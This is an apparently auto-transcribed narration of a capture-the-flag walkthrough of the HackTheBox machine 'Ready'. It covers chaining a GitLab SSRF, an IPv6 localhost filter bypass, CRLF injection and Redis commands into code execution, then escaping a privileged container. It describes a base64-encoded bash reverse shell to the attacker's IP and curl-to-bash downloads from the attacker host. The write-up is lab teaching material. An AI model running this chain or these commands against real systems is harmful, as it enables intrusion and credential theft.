What's going on YouTube? This is Ipsec. I'm doing Ready from HackTheBox, which starts out with finding an old GitLab instance from 2018, and that is vulnerable to an authenticated RCE, but registration's open to the public, so it might as well be unauthenticated since anyone can just register an account. The RCE itself is really cool, so instead of using an exploit script, we're going to step through it to analyze it because there's four main pieces to this exploit chain. The first is it's a server-side request forgery, meaning we can make the server make a request back to us. And the only protocols available are like HTTP, SSH, and Git. You can't use the standard Gopher to tunnel different protocols in. However, it is vulnerable to a CRLF, which is just inserting line breaks. So you don't really need Gopher. We can use the Git, insert a few lines to access Redis, which is listing on localhost, to execute commands and get a shell. It's really cool. And the piece I had missed off, because I know I said 4 pieces, only listed 3. The fourth one is bypassing a filter that prevents the SSRF from accessing ports on localhost by just specifying the IP address in a weird IPv6 way. So that is 4 pieces to the SSRF to get code execution. It's a really cool attack. Once we get shell on the box, the privesc is we're just running in a Docker that has a sysadmin privilege, I think. It's a privileged container, so we can just mount the disk and read files off the root. With that being said, let's jump in. As always, I'm going to start with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it ready, and then the IP address, which is 10.10.10.220. This can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open, the first one being SSH on port 22, and its spanner of 8.2p1 Ubuntu 4 tells me this is probably going to be Ubuntu Focal or Ubuntu 20. I bet if we just Google this, so putting here, open SSH and say Launchpad, we can go to the page where it's on Ubuntu, and let's see, it is Focal, which I think is Ubuntu 20. So we know that. And then we also have HTTP on port 5080. It's running Nginx. We have some NSE scripts go off by nmap. First, the robots.txt giving us some entries in there. And then we also have HTTP title saying we can sign in to GitLab. So we know on port 5080, it's a GitLab instance. So let's go over there. So let's go 10.10.10.220, port 5080. And eventually we should get to the sign-in page. And based upon registration being here, looks like there's open registration. So let's register for an account. And the main reason we like registering for GitLab is because, well, there may be some open projects here, and there could also be a way to enumerate versions. So we'll just check some basic enumeration once we log in. And let's see, let's go to snippets. I don't see any projects here. If we go to groups, explore groups, I don't think we have anything. I did snippets. There's no snippets here. Nothing here. If we go in the top right and click on help, we can see what version of GitLab this is, and it's 11.4.7. So I'm going to Google GitLab 11.4.7. If we do release, we have the patch release right here. The other good thing to search is like GitLab 11.4.7 changelog or release notes or just things like that, and you'll all get to the same page. Generally, whenever a changelog happens, they give you the version so you know how old it is. This one is November 21st, 2018. So this is a extremely old one. We don't really have any exploits here. If we go to the previous post, GitLab critical security release, so 11.5, and they're releasing a major security thing, and not too many details here. If we Google like GitLab RCE 2018, we get a lot of posts. And if we go here, I mean, we're just going to get auto-pwn scripts, which isn't going to be fun. So I'm going to search for GitLab, maybe GitLab? I'm going to look at GitLab source, and it worked. We have that. If I just search for GitLab, it doesn't. So kudos to Kudos to Google for knowing GitLab means I want to search the GitLab website for the GitLab repo. And then we can click, let's see, up here. And if we look, we have a lot of commits. And because this is going to be so old, it's going to be a pain to search. So if I search for merge branch security, I think that's how some of the things started. And I'm going to do this, and then we're going to use the power of video editing to scroll to around November 2018. So I'm just going to hold page down for probably a minute. So here we are. We can see November 2018 and a bunch of security issues. The one that really sticks out is this one to me. And that's because server-side request forgeries are like amazing. A lot of people kind of just find them, report them, and get it fixed because SSRF in itself is a bug. However, there are a lot of exploit chains with this that can make it a lot more dangerous. So this one saying merge branch security 11.5, fix webhook SSRF IPv6 into security. This is interesting because if we know how to do the SSRF, we can potentially find an exploit chain to take this to the next level. So this is specifying IPv6. So if we look at this, it's doing a validate localhost. So it's saying local IPs 127.0.0.1, then double colon 1 and quad zeros. So these are ways to specify like localhost. It's not all the ways, as we saw like years ago. I think in my holiday video, we did a lot of different ways to encode IPs, as we do see here. For instance, like I think this is octal notation. So if I like ping this 0177.1, like what do you think it's going to go? Do you think it's going to go to 0177.1? Well, yes, because it's encoded 127.0.0.1, but it's just in a weird format. The computers are magical. You can specify tons of formats. So here's another one that will go to localhost. Let's see. How about octets and hex? So ping. And then it's just knowing the zeros are like that. Like if I do .0.0, yep, it's going to do the same thing. We can say 0x1 still goes here. So there's a lot of cool ways you can specify IP addresses. Instead of doing like hex for each octet, why not just one long hex address? It works. So this is doing a SSRF validating localhost. So if we looked at CVEs, we'd see there was like a SSRF vulnerability within GitLab, but I'm just going to go over to projects, go to new projects. Let's see, create a project. And then we're going to import and git repo by URL. So this is where the vulnerability lies. If we try to do HTTP 127.0.0.1 and we give this a name, it's going to say, import URL is blocked, localhost not allowed. If we go to ourself, so 10.10.14.2, and then let's do nc lvnp 80. We got to listen on sudo, or use sudo to listen. See, it's just going to go there. We create the project, and the server connects back to us, and we get this header. So we get a lot of information here, and this in itself isn't a vulnerability. We made the server make a request so it can go download a file and do something with the file. That's not a vulnerability. That's using the application as it's intended. The vulnerability lies is because the developer doesn't want you to access ports on localhost because those aren't exposed externally, and there could be some sensitive protocols listing on localhost. In GitLab's case, it is Redis, which is a caching agent, and if you access it, there are some command lines you can send to get code execution based upon the protocol. So we're looking at this, and when we did that, we had a bunch of junk here. So we can't really put extra information here. The main way people chain SSRFs into actual code execution is using Gopher, because you can just like craft packets on the wire, or not craft, like craft bytes on the wire. It's a very minimal protocol, meaning like I tell Gopher to connect and then I just put data here and I could craft this whole message. So let's try Gopher first. So instead of HTTP, let's do Gopher 10.10.14.2 port 80. We'll call this test 2. And we are listening, right? Yep. We create project and URL is blocked. We only allow HTTP, HTTPS, SSH, and GET. So if we do GET on this, we create the project. Let's see. It's saying path can only contain letters, digits, so it doesn't like the colon in this project slug. That's fine. Create the project. Path has already been taken. Let's do, this will be git test. Create project. And let's see. Should be doing git colon 10.10.14.2.80. And why did it not connect to me? That is bizarre. I wonder if I have to specify like a path. Because normally when you do git, you specify a .git file. So let's do a new project real quick. Let's do test 3. We have to import project, repo by URL, git test.git. So this is generally how you would use git URL. If you're confused, I mean, if we just go to GitHub and search for IPSec, you can see I have a few projects. So if we go like ipsec.github.io, which is my like website ipsec.rocks, all the source code there, we can, I thought there'd be an SSH option. Weird. I could swear there's used to be SSH. Now we got this GitHub. I don't know, but if you do this and you see a SSH option, let's do GitLab. It ends in .git. I don't know what that command line client is for GitHub. That is, I guess, new. So clone with SSH. So git, and then it ends with .git. On HTTPS, oh, it is ending with .git as well. But let's try making that end in .git. Long way to go for, I don't know what just happened there, but we'll get there. So I am listening on 80. Let's just double check. Yes, I am. And I'm doing 10.10.14.2 test.git. Create project. There we go. So we have it connecting back to me. So if we want to actually craft stuff, we have to be able to send data. And if this was Gopher, we could just like do the hex for line break, I think 0D, 0A, and then put stuff on a new line. So let's kind of try that with this git, see if there's that type of vulnerability here. So we have to, again, go back, import project, repo by URL. Let's do test.git, sure, test 4. And we'll call this test 4, I guess. And I'm going to send this one to Burp Suite. So create project, go to Burp Suite, and we can see the git is right here. It ends in test.git. So I'm going to do please subscribe. And then we're just going to forward this packet. And we see a please subscribe here. So we can now make a connection back to ourselves and send lines. So if we can connect to a port on the GitLab server, we can then send lines afterwards. So I'm going to search for GitLab SSRF RCE. And of course, let's take Burp Suite off. And let's see. Well, this one looks like it's going to be a like one and done script that we won't learn from. But here we go. We have this one post and it's talking about, the specifying an IPv6, kind of like what we looked at with the GitLab issue. So let's go in new project and let's make sure we can hit localhost. Before we go down this path too far, in order for this RCE to work, we have to be able to hit ports on localhost. So I'm going to call this test 5, but we have to import project, git. So we'll do git, and then let's look at my last ping. Let's try doing it with a hex address, test.git, test 5, slug, test 5, sure. And we probably should specify the port. There we go. Create project. URL is blocked. Request to localhost not allowed. So on those Git issues, there were other ones, like specifying it through IPv6. So we can try this. So let's go to this tab and then specify this. Sure, we can leave it at foo, create project, and it works. So IPv6 works in importing the URL. I'm going to copy this to my clipboard so we can do it a bit quicker the next time. And if we look at the post, it's doing the same thing. So that is the same exact thing we sent. And it's going for RCE by sending these lines, multi, sadd, lpush, and a few execs. So let's try that. So projects new, import, repo by URL, specify this. And we want to specify what port it was. What port is Redis? He's doing 6379. So go here. The port goes after this. Okay. We'll say RCE 1, we'll call it. And we will have to intercept this packet. So send it to Burp Suite. Let's make sure my proxy is clean. Create project. There we go. And right here is where we want to insert code. So let's go back, and I can close out some of these tabs to make it a bit easier to switch back and forth. So we want to send these lines. Yeah. I don't know why he's sending exec 3 times, but the first time doesn't work. Try, and try again. So all I'm doing here is getting rid of that beginning space. And what he's running is this setsid python and then temp nc.py. Don't know what that is. So what we can do is let's try ping. So ping-c 10.10.14.2. We need c space 1, 10.10.14.2. Okay. So sudo tcp dump -i ton 0 -n. And we'll see if this works. And I'm going to just copy this whole thing. So if it doesn't, we can quickly swap it out. So forward. And then we go back to the browser. It is doing an import in progress. So let's see if we have any pings. We have one from 10.10.10.220 back to myself. So it's pinging multiple. Oh, probably because we did the exec multiple times. But we can see it looks like it is working. More than I expected, though. Did I specify? Oh, I did not specify ICMP. So this was me hitting the page. I was like, why is it on port 5080? But yeah, we do have a ping, but that is from 10.10.14.2. So we may have to send this again. So let's do new project, RCE2, import project, by URL. Let's do, it doesn't really matter what the URL is because I'm going to change it in Burp Suite. I have everything on my clipboard. So I just want to get something quick. So now we can go to this URL and then paste. And we're back where we left. The reason why I didn't just send this to repeater is in case there's like an CSRF token or something. So let's see. We did ping 10.10.14.2 read. Okay. I'm just going to clear this. And we will forward and see if we get anything. And again, this is just me going to the gateway, so nothing special there. I'm looking for 220. Name has been taken. So test 5. Oh, that's been taken. Test 6. Yeah. Test 6 sounds fine. I don't know how that's going to work. I don't think it put line breaks there. So let's just stop at foo. Make sure Burp Suite window is cleared out. Send it. And let's see. Here's foo. And here's the start. So get rid of that. It's a URL. Going here, foo. Project test 6. Okay. I think this is fine. I am pinging. Forward. Turn intercept off. Import in progress. So now it is connecting to Redis, hopefully, and it may ping us if we did everything correctly, and it doesn't look like it is. So maybe ping isn't on this box, or maybe we did something wrong. It's more likely we did something wrong, but it's always possible ping's not there. This is potentially a Docker instance, so let's try something else. So go back to here. This is the painful part. Let's do HTTP test 7. Okay, make sure my burp suite is intercepting. Create project. And then let's see, this URL, we can put our git. Instead of ping, let's do Whoami, and maybe the binary NC is on the box. So NC 10.10.14.2, port 80. Sudo nc lvnp 80. Send, turn intercept off. We're doing a Whoami now. I wonder if we don't want to begin with a pipe, if that's the issue. Because it still is not connecting. There we go. We got a hit back, but it's an old one. Maybe I should try a different port when we do this the next time. And I'm going to add the spaces. If you remember when I was creating the payload, let's do port 9001. I got rid of those like beginning spaces because I thought it was a clipboard thing. Maybe that's actually needed. So let's go back to new, import project, repo by URL. That's still in my clipboard. Awesome. So test. Let's do actually HTTP test 9, I think. It's getting ridiculous. If I was doing this like on an engagement, I would probably have used Docker to build this instance and create a working payload locally first, so I don't create a bunch of these projects. But since this is just HackTheBox, it's learning, so we don't have to worry about that. So what I want to do is put a space at the beginning of everything. Okay. Ping C1, let's try this. Sudo tcp dump -i ton0 icmp. I like -n, even though it's probably not needed. Forward, turn intercept off. It is importing, and we still don't have anything. So let's try one last thing before we go back to the drawing board. So let's go back to his blog post, and we want to specify the URL. So this. Okay. And we'll say RCE 2. Yep. Burp suite, intercept on, new project. And then right here is where we put it in. And I'm going to copy and paste in case something got screwed up between all my copy and pasting before. I'm going to do it again. And let's see. We just want to NC. So who am I? Then NC 10.10.14.2 port 80. Okay, that looks fine. Oh, nope, 9001. Glad I caught that. And still no hitbacks. I wonder if I end this with anything. Let's see. How does he do it? If we go here, eval and Q, he does have a space. So I'll put a space there. And then we will forward. Going here, import in progress. There we go. I wonder if it was the space. Let's see. Let's go back. Let's try the ping again. And then I'm going to do a space, and we'll see if that's it. RCE3. URL. because I'm kind of curious if ping is just not in the box, because ping is like my go-to of this is always going to work. So it not being there is concerning to me. So let's see, RCE3, intercept on, create. Then we go where this git is. Go here, scroll down for its payload. And then we copy this. Once the spaces. Yeah, he does have a space there. Ping-C1 10 10 14 2. And I have a space. My TCP dump is still going. Forward. It is importing. And we don't get it something. So it has NC, but it doesn't have ping, which is weird, but that's fine. Now we have to find a way to get a reverse shell. So because I already know I'm going to have like a painful time with what's on this box, I'm just going to base64 encode this. And also because like this is going in a parameter with quotes. These are escaped quotes. It's a pain. So let's do echo -n. And then what is it? Bash-c. I'll put this in single quotes. Then bash-i. Dev TCP 10 10 14 2 9001 0 at and 1 like that. That should be good. Then we want to base64 encode it. So base64-w0. So we have this. I wish that plus was not there, because the plus is a weird character, but oh well. Echo-n, base64-d, bash, nc lvnp 9001. We get a connection. Okay. So we have this, and let's go and do this payload again, see if it works. If it doesn't, I may try playing with the base64 to not do the plus, because it could be a bad character. It may not. I don't know. Let's do RCE4. We got an import project, URL. I've been having the most luck just copying everything instead of doing it all at once. So RCE4, burp suite on, create project, then put a line break there, scroll down, copy, paste, like that, I think. It pasted weird, but oh well. And we want to put a one-liner here. So let's copy, and paste. Right there. Echo-n bash space. So we'll see if this works. nc lvnp 9001. We are already listening. Oh no, I forgot the L. There we go. So now, if I forward this, turn intercept off, import is in progress, and we'll see if we get anything. Does not look like we are. So what I'm going to do is, let's see, do we have that somewhere? Was it in this pane? Let's go to CyberChef real quick. I'm going to see if I can get rid of that space. CyberChef. And if I can't get rid of the space, we'll just switch payloads. So let's go to CyberChef. Come on. And it could also not have bash. It's another potential. Like it not having NC is throwing me off. So let's see. Let's take this off. Let's see. Actually, copy. Let's just put input there and go to base 64. So just put extra space there. That was easy. So let's do an extra space here. Let's see, equals is probably fine. I'm going to live with an equals. We'll trade getting rid of space for leaving the equals there. So now we have something that doesn't have space and, well, a plus. Every time I say space, I say plus. And the reason why that's the bad character is plus and like URLs or post data could be translated to a space. Make sure my payload still works. Does not, because I don't have, let's see, that is on me, base 64-D. Payload still works. So let's try this before we throw out this idea of this type of payload. So going back here, we can import. So let's see. New project, URL. And I think this box was like blooded in 15 minutes, which is kind of impressive because as you see, the exploit isn't super straightforward, but maybe by the time the box was released, the exploit had a script that we could just do. But doing this manually is not the easiest thing, as you see. RCE 5. Let's go burp suite. So let's see. Do lines. I really should have this automated, but if I was going to automate it, might as well just pull one of those exploit scripts. So let's see. Exec. And we can put our payload here. And I probably should have tested this before the video, but for some reason, you guys like watching me struggle in this type of troubleshooting. So, no idea if this is going to work. Sudo nclvnp. I don't need it because it's 9001. It's not a privileged port, but have it anyways. Oh my god, that was it! The plus. Wow. That was like a long shot. It's probably me doing something else wrong in that, but if that actually was it and it converting it, actually I think it is because it's treating this whole thing as a URL, right? And as we see here, equals, let's see, equals is here. I bet the space, if we had looked at this, it put a space here. Wow. I'm actually really happy I went down that path. Learned something new. So now we have a shell on the box. So let's do Python. Well, first, which ping? Ping is not on the box, so that is why. Which nc, we see it gives me the path. So which Python, which Python 2, which Python 3. There we go. Python 3 is on the box. So import pty, pty.spawn, bin bash, stty raw minus echo, fg enter enter, and then I can export term is equal to xterm, so I can clear the screen. Awesome. Now that we have a shell on the system, the very first thing I like doing is just looking at like the IP address. We can do ifconfig if IP doesn't exist, and oh god, both of these don't exist. LSLA on slash, and we do see we're inside a Docker environment. So the very first script I probably want to run is called DeepCE. So I'm going to make dir dub. I'm going to go and pull DeepCE. So DeepCE GitHub, and we can go to this script, and this is just like a Docker script. Docker's like logo is a whale, so that's where it gets the name DeepCE. And they provide a nice wget one-liner just to download it here. And since HackTheBox doesn't have internet, that's why I'm downloading it to my machine. So stand up a web server and we can curl 10.10.14.2, port 8000, DeepCE.sh, pipe it over to bash. And we can see right off the bat, it said it was exploitable. So let's see what we have. So exploit test, exploitable, check this out, and positive, another, I don't know exactly what it's saying is exploitable. Yes, we're inside a container. Tools, none. Users git, container ID. We have IP address information. 172.19, this is the default like Docker IP range. Some useful tools that are installed: curl, wget, nc, hostname, Python 3. Cap.sh isn't installed, so it doesn't tell us the dangerous capabilities. We have SSHD on port 22. So we could SSH into this Docker maybe? I don't know. We have Docker sock mount and no other mounts. We have this /root_pass. That's interesting. And we can't read the shadow file. So let's cat root pass. Is it going to be that easy? Cat etc passwd cat root pass. There's a user called dude su dash. Let's paste to see if we get in. We don't. Su dash dude. See if we can get shell as him. I'm going to grep for /bin on etc passwd to get all these users. We can try, I don't know why Mattermost is on the server, su dash Mattermost, paste the password, and I don't know what this root pass thing is doing. So I'm going to go over and we're going to try a different enumeration script. So cp opt privilege escalation awesome script suite, linPEAS, linPEAS.sh to dub, and let's run linPEAS. So curl 10.10.14.2, 8000 linPEAS.sh, pipe it over to bash, and let this run to see if this gives us anything else. Once we get to root, maybe I'll try running DeepCE again to see if we get different things. Generally in Docker, most escapes, you want to be root on the container. So a lot of people just give root to Docker containers to begin with because who cares? But I said who cares because Docker is meant to be like isolated by default. So if someone gets root on the container, I mean, it's limited to the service they exploited. So it doesn't really matter that much. But if there's capabilities and stuff involved in Docker, being root is helpful because it's just like that. We'll probably find out in a few minutes as we go through this output. Signature verification. Is this a virtual machine? linPEAS is telling us yes. Rootless Docker, nope, because we are the Git user. We have current capabilities, chown, bunch of things. Sys module, the sysadmin is a dangerous one. ptrace, so we can potentially debug things. Well, like ptrace, if we can debug a root process, we may be able just to get it to execute code. But looking at devices as well, we see SDA. And this is probably the root disk. So if we can just mount SDA 1, 2, or 3, whichever one is root on the file system, we can just get access to root that way. However, we can't root as the Git user because that is a privileged command. So we have to escalate to root on this container in order to mount those SDA devices. So now we're just looking at processes right now. You can see this is like my reverse shell right now. We're doing the one-liner, then bash, bash-c, Python, curling linPEAS, and linPEAS doing things. So yeah, looking at process permissions, nothing interesting there. IP tables. We have more of this user dude. All users groups, password policy, NFS export. We have this weird opt backup directory that contains like Docker Compose, secrets, and GitLab. So we probably should look at the backup directory if we don't have anything. So let's go cd opt backup, Docker Compose. And this looks like it is going to be the GitLab file to build this container. So ports, we can see privileged equals true. So this is why the SDA block device was available in our Docker. And nothing too interesting there. We have GitLab Rails initial root password root pass. So it's setting the GitLab password to be that root pass. So that's what that file is. If we look here, we have GitLab secrets. That's internal key. What's GitLab.rb? Let's get rid of all the comments because comments don't really matter. So starts with, which is the caret, and then we escape the £. We want grep-v, and then grep period to grep for anything but just a line break, and we have a SMTP password. So let's try this with the root. So let's copy this, paste, and we are root on this container. So let's curl 10.10.14.2 8000 DeepCE.sh, pipe it over to bash, and curl was in some weird directory. Dev shm wget. Let's do 10.10.14.2 8000 DeepCE.sh, and we can just execute this. So let's see if cap.sh is now on this. Does this give us anything else? So here we go. As root, it allows us to enumerate the privileges. Pretty much the same things were highlighted as linPEAS. The weird thing is this script required us to be root while linPEAS did not. So maybe DeepCE isn't a great script to run anymore because linPEAS was able to get this anyways, but I don't know. Let's now make dir mount SDA1 mount dev SDA1 to mount SDA1. Let's do make dir SDA2. And let's look at what's in SDA2. Looks like the root file system. So let's go mount SDA2 root. And we can get root.txt. Is there a .ssh directory? Looks like there is. IDRSA and IDRSA.pub. Let's cat IDRSA.pub and authorize keys. And it looks like NV, they end in the same thing. So we should be able to just copy this IDRSA to a box and SSH into this to get root here. So let's root.pem, I guess I'll call it. chmod 600 sh-i on the file root at 10.10.10.220. And we are now root on ready, and we can get root.txt. So hope you guys enjoyed the box or the video. Take care, and I will see you all next time.